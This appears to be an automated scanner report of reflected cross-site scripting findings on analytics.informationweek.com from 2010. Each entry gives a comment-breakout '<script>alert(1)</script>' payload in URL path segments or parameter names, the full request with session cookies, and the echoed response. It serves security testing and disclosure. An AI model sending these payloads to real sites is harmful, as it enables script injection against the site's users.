GET /menu/6/Data-center/Data-center.html?b2ddb--><script>alert(1)</script>59b4ad09867=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ter%2FData-center.html%3Fb2ddb--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E59b4ad09867%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/6/Data-center/Data-center.html?b2ddb--><script>alert(1)</script>59b4ad09867=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload eb9ee--><script>alert(1)</script>3971533e5ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menueb9ee--><script>alert(1)</script>3971533e5ec/7/Enterprise-software/Enterprise-software.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:09 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:09 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenueb9ee--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3971533e5ec%2F7%2FEnterprise-software%2FEnterprise-software.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menueb9ee--><script>alert(1)</script>3971533e5ec/7/Enterprise-software/Enterprise-software.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6530f--><script>alert(1)</script>0f554b3848a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/76530f--><script>alert(1)</script>0f554b3848a/Enterprise-software/Enterprise-software.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:22 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:24 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2Fmenu%2F76530f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f554b3848a%2FEnterprise-software%2FEnterprise-software.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/76530f--><script>alert(1)</script>0f554b3848a/Enterprise-software/Enterprise-software.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 394db--><script>alert(1)</script>ad5fb2f5388 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/7/Enterprise-software394db--><script>alert(1)</script>ad5fb2f5388/Enterprise-software.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ise-software394db--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ead5fb2f5388%2FEnterprise-software.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/7/Enterprise-software394db--><script>alert(1)</script>ad5fb2f5388/Enterprise-software.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 52ffa--><script>alert(1)</script>da46735b536 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/7/Enterprise-software/Enterprise-software.html52ffa--><script>alert(1)</script>da46735b536 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:46 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:47 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... -software.html52ffa--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eda46735b536&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html52ffa--><script>alert(1)</script>da46735b536"> ...[SNIP]...
3.135. http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5f524--><script>alert(1)</script>fd55c962d4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/7/Enterprise-software/Enterprise-software.html?5f524--><script>alert(1)</script>fd55c962d4f=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... e.html%3F5f524--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efd55c962d4f%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/7/Enterprise-software/Enterprise-software.html?5f524--><script>alert(1)</script>fd55c962d4f=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload f5a72--><script>alert(1)</script>d5ede8dd7a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menuf5a72--><script>alert(1)</script>d5ede8dd7a5/8/Green-computing/Green-computing.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:44:59 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... nweek.com%2Fmenuf5a72--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed5ede8dd7a5%2F8%2FGreen-computing%2FGreen-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuf5a72--><script>alert(1)</script>d5ede8dd7a5/8/Green-computing/Green-computing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8a77b--><script>alert(1)</script>14b87dd0fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/88a77b--><script>alert(1)</script>14b87dd0fa5/Green-computing/Green-computing.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:12 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:12 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... eek.com%2Fmenu%2F88a77b--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E14b87dd0fa5%2FGreen-computing%2FGreen-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/88a77b--><script>alert(1)</script>14b87dd0fa5/Green-computing/Green-computing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload afe6f--><script>alert(1)</script>4134aba7b4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/8/Green-computingafe6f--><script>alert(1)</script>4134aba7b4e/Green-computing.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:21 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:21 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F8%2FGreen-computingafe6f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4134aba7b4e%2FGreen-computing.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/8/Green-computingafe6f--><script>alert(1)</script>4134aba7b4e/Green-computing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload a1f26--><script>alert(1)</script>08e46325f45 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/8/Green-computing/Green-computing.htmla1f26--><script>alert(1)</script>08e46325f45 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:30 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45925
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FGreen-computing.htmla1f26--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E08e46325f45&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.htmla1f26--><script>alert(1)</script>08e46325f45"> ...[SNIP]...
3.140. http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://analytics.informationweek.com
Path:
/menu/8/Green-computing/Green-computing.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c1ee--><script>alert(1)</script>398d76ee13b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/8/Green-computing/Green-computing.html?9c1ee--><script>alert(1)</script>398d76ee13b=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... computing.html%3F9c1ee--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E398d76ee13b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/8/Green-computing/Green-computing.html?9c1ee--><script>alert(1)</script>398d76ee13b=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload d25e7--><script>alert(1)</script>4b9134bfae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menud25e7--><script>alert(1)</script>4b9134bfae2/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:31 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:33 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 9134bfae2%2F81%2FBusiness-intelligence-and-information-management%2FBusiness-intelligence-and-information-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menud25e7--><script>alert(1)</script>4b9134bfae2/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload b967f--><script>alert(1)</script>838a3736468 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81b967f--><script>alert(1)</script>838a3736468/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:53 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:53 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46059
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 838a3736468%2FBusiness-intelligence-and-information-management%2FBusiness-intelligence-and-information-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81b967f--><script>alert(1)</script>838a3736468/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e195e--><script>alert(1)</script>ad9c07df00 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81/Business-intelligence-and-information-managemente195e--><script>alert(1)</script>ad9c07df00/Business-intelligence-and-information-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:42:17 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:17 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3Ead9c07df00%2FBusiness-intelligence-and-information-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/81/Business-intelligence-and-information-managemente195e--><script>alert(1)</script>ad9c07df00/Business-intelligence-and-information-management.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 910c8--><script>alert(1)</script>a52c545ddcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/81/Business-intelligence-and-information-management/Business-intelligence-and-information-management.html910c8--><script>alert(1)</script>a52c545ddcc HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
